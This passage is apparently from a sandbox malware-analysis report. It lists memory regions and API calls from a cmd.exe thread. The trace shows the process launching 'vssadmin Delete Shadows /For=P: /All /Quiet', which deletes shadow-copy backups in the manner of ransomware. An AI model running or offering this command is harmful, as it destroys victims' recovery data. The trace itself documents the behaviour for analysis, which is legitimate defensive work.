	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3110
	        start_va = 0x1c0000
	          end_va = 0x24ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3111
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3114
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3115
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3116
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3124
	        start_va = 0x4600000
	          end_va = 0x486ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 3125
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3128
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3129
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3130
	        start_va = 0x7e5d0000
	          end_va = 0x7e6cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e5d0000"
	        filename = ""

Region:
	              id = 3262
	        start_va = 0x4600000
	          end_va = 0x46bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3263
	        start_va = 0x4770000
	          end_va = 0x486ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004770000"
	        filename = ""

Region:
	              id = 3264
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 3265
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3266
	        start_va = 0x240000
	          end_va = 0x24ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000240000"
	        filename = ""

Region:
	              id = 3267
	        start_va = 0x4870000
	          end_va = 0x496ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004870000"
	        filename = ""

Region:
	              id = 3268
	        start_va = 0x4350000
	          end_va = 0x439ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3269
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3270
	        start_va = 0x4390000
	          end_va = 0x439ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004390000"
	        filename = ""

Region:
	              id = 3390
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 3463
	        start_va = 0x4970000
	          end_va = 0x4ca6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 251
	os_tid = 0xc3c

	[0263.060] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0263.061] GetProcessHeap () returned 0x4770000
	[0263.061] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x400a) returned 0x477b998
	[0263.061] GetProcessHeap () returned 0x4770000
	[0263.062] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477b998) returned 1
	[0263.064] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0263.064] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0263.065] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0263.065] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0263.065] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0263.065] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0263.065] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0263.065] GetProcessHeap () returned 0x4770000
	[0263.065] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x58) returned 0x47774f8
	[0263.065] GetProcessHeap () returned 0x4770000
	[0263.065] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x1a) returned 0x4779048
	[0263.068] GetProcessHeap () returned 0x4770000
	[0263.068] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x52) returned 0x4779070
	[0263.070] GetConsoleTitleW (in: lpConsoleTitle=0x18f780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0263.389] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0263.390] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0263.391] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0263.392] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0263.393] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0263.394] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0263.395] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0263.396] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0263.396] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0263.396] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0263.396] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0263.397] GetProcessHeap () returned 0x4770000
	[0263.397] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x210) returned 0x47790d0
	[0263.397] GetProcessHeap () returned 0x4770000
	[0263.397] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x64) returned 0x47792e8
	[0263.398] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0263.398] GetProcessHeap () returned 0x4770000
	[0263.398] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x418) returned 0x47705c8
	[0263.399] SetErrorMode (uMode=0x0) returned 0x0
	[0263.399] SetErrorMode (uMode=0x1) returned 0x0
	[0263.399] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47705d0, lpFilePart=0x18f28c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f28c*="Desktop") returned 0x1d
	[0263.400] SetErrorMode (uMode=0x0) returned 0x1
	[0263.400] GetProcessHeap () returned 0x4770000
	[0263.400] RtlReAllocateHeap (Heap=0x4770000, Flags=0x0, Ptr=0x47705c8, Size=0x56) returned 0x47705c8
	[0263.400] GetProcessHeap () returned 0x4770000
	[0263.400] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47705c8) returned 0x56
	[0263.400] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0263.401] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0263.401] GetProcessHeap () returned 0x4770000
	[0263.404] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x182) returned 0x4779358
	[0263.404] GetProcessHeap () returned 0x4770000
	[0263.404] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x2fc) returned 0x4770628
	[0263.603] GetProcessHeap () returned 0x4770000
	[0263.603] RtlReAllocateHeap (Heap=0x4770000, Flags=0x0, Ptr=0x4770628, Size=0x184) returned 0x4770628
	[0263.603] GetProcessHeap () returned 0x4770000
	[0263.603] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4770628) returned 0x184
	[0263.603] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0263.603] GetProcessHeap () returned 0x4770000
	[0263.603] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0xe0) returned 0x47794e8
	[0263.610] GetProcessHeap () returned 0x4770000
	[0263.610] RtlReAllocateHeap (Heap=0x4770000, Flags=0x0, Ptr=0x47794e8, Size=0x76) returned 0x47794e8
	[0263.610] GetProcessHeap () returned 0x4770000
	[0263.610] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794e8) returned 0x76
	[0263.612] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0263.612] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f018, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f018) returned 0xffffffff
	[0263.613] GetLastError () returned 0x2
	[0263.613] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0263.614] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f018, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f018) returned 0xffffffff
	[0263.614] GetLastError () returned 0x2
	[0263.615] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0263.615] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f018, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f018) returned 0x4779568
	[0263.615] GetProcessHeap () returned 0x4770000
	[0263.616] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x0, Size=0x14) returned 0x4777c30
	[0263.616] FindClose (in: hFindFile=0x4779568 | out: hFindFile=0x4779568) returned 1
	[0263.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f018, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f018) returned 0xffffffff
	[0263.616] GetLastError () returned 0x2
	[0263.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f018, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f018) returned 0x4779568
	[0263.617] GetProcessHeap () returned 0x4770000
	[0263.617] RtlReAllocateHeap (Heap=0x4770000, Flags=0x0, Ptr=0x4777c30, Size=0x4) returned 0x4777358
	[0263.617] FindClose (in: hFindFile=0x4779568 | out: hFindFile=0x4779568) returned 1
	[0263.617] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0263.617] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0263.617] GetConsoleTitleW (in: lpConsoleTitle=0x18f50c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0263.718] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f438, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f41c | out: lpAttributeList=0x18f438, lpSize=0x18f41c) returned 1
	[0263.718] UpdateProcThreadAttribute (in: lpAttributeList=0x18f438, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f424, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f438, lpPreviousValue=0x0) returned 1
	[0263.718] GetStartupInfoW (in: lpStartupInfo=0x18f470 | out: lpStartupInfo=0x18f470*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0263.718] GetProcessHeap () returned 0x4770000
	[0263.719] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0x18) returned 0x47778f0
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0263.719] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0263.720] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0263.721] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0263.722] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0263.722] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0263.722] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0263.722] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0263.722] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0263.722] GetProcessHeap () returned 0x4770000
	[0263.722] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47778f0) returned 1
	[0263.722] GetProcessHeap () returned 0x4770000
	[0263.722] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0xa) returned 0x4779568
	[0263.722] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0263.727] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=P: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f3c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=P: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f40c | out: lpCommandLine="vssadmin  Delete Shadows /For=P: /All /Quiet ", lpProcessInformation=0x18f40c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1294, dwThreadId=0x1298)) returned 1
	[0263.752] CloseHandle (hObject=0xa4) returned 1
	[0263.752] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0263.752] GetProcessHeap () returned 0x4770000
	[0263.753] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477adf0) returned 1
	[0263.753] GetEnvironmentStringsW () returned 0x477a248*
	[0263.753] GetProcessHeap () returned 0x4770000
	[0263.753] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0xb9c) returned 0x477adf0
	[0263.753] memcpy (in: _Dst=0x477adf0, _Src=0x477a248, _Size=0xb9c | out: _Dst=0x477adf0) returned 0x477adf0
	[0263.753] FreeEnvironmentStringsA (penv="=") returned 1
	[0263.753] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0279.050] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f3a4 | out: lpExitCode=0x18f3a4*=0x2) returned 1
	[0279.052] CloseHandle (hObject=0xa8) returned 1
	[0279.053] _vsnwprintf (in: _Buffer=0x18f48c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3ac | out: _Buffer="00000002") returned 8
	[0279.054] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0279.055] GetProcessHeap () returned 0x4770000
	[0279.055] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477adf0) returned 1
	[0279.056] GetEnvironmentStringsW () returned 0x477a248*
	[0279.056] GetProcessHeap () returned 0x4770000
	[0279.056] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0xbc2) returned 0x477c568
	[0279.056] memcpy (in: _Dst=0x477c568, _Src=0x477a248, _Size=0xbc2 | out: _Dst=0x477c568) returned 0x477c568
	[0279.056] FreeEnvironmentStringsA (penv="=") returned 1
	[0279.056] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0279.056] GetProcessHeap () returned 0x4770000
	[0279.057] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477c568) returned 1
	[0279.057] GetEnvironmentStringsW () returned 0x477a248*
	[0279.057] GetProcessHeap () returned 0x4770000
	[0279.057] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0x8, Size=0xbc2) returned 0x477c568
	[0279.057] memcpy (in: _Dst=0x477c568, _Src=0x477a248, _Size=0xbc2 | out: _Dst=0x477c568) returned 0x477c568
	[0279.057] FreeEnvironmentStringsA (penv="=") returned 1
	[0279.057] GetProcessHeap () returned 0x4770000
	[0279.057] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779568) returned 1
	[0279.057] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f438 | out: lpAttributeList=0x18f438) 
	[0279.058] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0279.058] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0279.496] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0279.496] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0280.086] _get_osfhandle (_FileHandle=0) returned 0x38
	[0280.086] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0280.342] SetConsoleInputExeNameW () returned 0x1
	[0280.342] GetConsoleOutputCP () returned 0x1b5
	[0280.744] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0280.744] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0281.048] exit (_Code=2) 

Thread:
	id = 265
	os_tid = 0xc7c


Process:
